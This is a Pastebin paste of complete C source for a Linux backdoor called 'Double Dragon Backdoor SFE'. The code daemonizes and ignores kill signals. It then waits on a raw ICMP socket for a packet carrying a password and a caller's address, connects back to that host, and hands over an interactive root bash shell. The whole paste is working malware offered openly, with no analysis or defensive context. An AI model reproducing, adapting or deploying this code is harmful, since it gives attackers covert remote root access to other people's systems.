Advertisement
FlyFar

ranzou-sfe.c

Jun 6th, 2023
664
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.23 KB | Cybersecurity | 0 0
  1. /*
  2.          Double Dragon Backdoor SFE (Special Firewall Edition)
  3.                 by tHE rECIdjVO <recidjvo@pkcrew.org>
  4.  
  5.                    Member of the Packet Knights Crew
  6.                         http://www.pkcrew.org/
  7.  
  8.                         ---> Player 1: Ranzou
  9.                                                                 */
  10.  
  11. #define PASSWD "passwd"
  12. #define USER "root"
  13.  
  14. #define PROGRAM "Double Dragon Backdoor SFE (Special Firewall Edition)"
  15. #define AUTHOR "tHE rECIdjVO <recidjvo@pkcrew.org>"
  16.  
  17. #include <stdio.h>
  18. #include <stdlib.h>
  19. #include <string.h>
  20. #include <signal.h>
  21. #include <pwd.h>
  22. #include <unistd.h>
  23. #include <netdb.h>
  24. #include <sys/socket.h>
  25. #include <sys/types.h>
  26. #include <netinet/in.h>
  27. #include <netinet/ip.h>
  28. #include <netinet/ip_icmp.h>
  29. #include <grp.h>
  30.  
  31. // Data to receive
  32. struct cb_data{
  33.     char pass[30];
  34.     u_long jimmy_ip;
  35.     u_short jimmy_port;
  36. };
  37.  
  38. int main(int argc, char *argv[]);
  39. void wait_icmp(void);
  40. void callback(u_long jimmyip, int jimmyport);
  41.  
  42. int main(int argc, char *argv[])
  43. {
  44.     // Signal handling
  45.     signal(SIGINT, SIG_IGN);
  46.     signal(SIGHUP, SIG_IGN);
  47.     signal(SIGTERM, SIG_IGN);
  48.  
  49.     // Going in the background
  50.     if(fork() == 0) {
  51.         setsid();
  52.         wait_icmp();
  53.     }
  54.     exit(0);
  55. }
  56.  
  57. void callback(u_long jimmyip, int jimmyport)
  58. {
  59.     int jsock, jconn;
  60.     struct sockaddr_in jaddr;
  61.     struct passwd *userent;
  62.     gid_t groups[1];
  63.  
  64.     setsid();
  65.     // Connect to the caller host
  66.     if((jsock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  67.         exit(1);
  68.     }
  69.  
  70.     jaddr.sin_family = AF_INET;
  71.     jaddr.sin_addr.s_addr = inet_addr(inet_ntoa(jimmyip));
  72.     jaddr.sin_port = htons(jimmyport);
  73.  
  74.     sleep(2);
  75.     if(connect(jsock, &jaddr, sizeof(jaddr)) < 0) {
  76.         exit(2);
  77.     }
  78.  
  79.     // Dup socket
  80.     dup2(jsock, 0);
  81.     dup2(jsock, 1);
  82.     dup2(jsock, 2);
  83.  
  84.     // Read user data and set privileges
  85.     if((userent = getpwnam(USER)) == NULL) {
  86.         userent = getpwnam("root");
  87.     }
  88.     initgroups(userent->pw_name, userent->pw_gid);
  89.     setgid(userent->pw_gid);
  90.     setuid(userent->pw_uid);
  91.  
  92.     // Run the shell
  93.     printf("\n\n\t" PROGRAM "\n\t\tby " AUTHOR "\n\nWelcome, you are now ");
  94.     fflush(stdout);
  95.     system("whoami");
  96.     execl("/bin/bash", "/bin/bash", "-noprofile", "-norc", "-i", 0);
  97.     close(jsock);
  98.     exit(0);
  99. }
  100.  
  101. void wait_icmp(void)
  102. {
  103.         char *packet;
  104.         struct ip *pip;
  105.         struct icmp *picmp;
  106.     struct cb_data *pdata;
  107.         int sock, strlen, hincl = 1;
  108.         struct sockaddr_in from;
  109.  
  110.     // Create socket to receive ICMP data
  111.         if((sock = socket(AF_INET, SOCK_RAW, 1)) < 0) {
  112.         exit(1);
  113.         }
  114.         packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + 64);
  115.         pip = (struct ip *)packet;
  116.         picmp = (struct icmp *)(packet + sizeof(struct ip));
  117.         pdata = (struct cb_data *)(packet + sizeof(struct ip) + sizeof(struct icmp));
  118.         memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + 64);
  119.  
  120.     strlen = sizeof(from);
  121.     while(1) {
  122.         // Read each ICMP packet searching for a matching passwd
  123.             recvfrom(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + 64, 0, (struct sockaddr *)&from, &strlen);
  124.         if(strncmp(PASSWD, pdata->pass, sizeof(PASSWD)) == 0) {
  125.             if(fork() != 0) {
  126.                 // Start the callback
  127.                 callback(pdata->jimmy_ip, pdata->jimmy_port);
  128.             }  
  129.         }
  130.     }
  131. }
Tags: Linux Backdoor
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement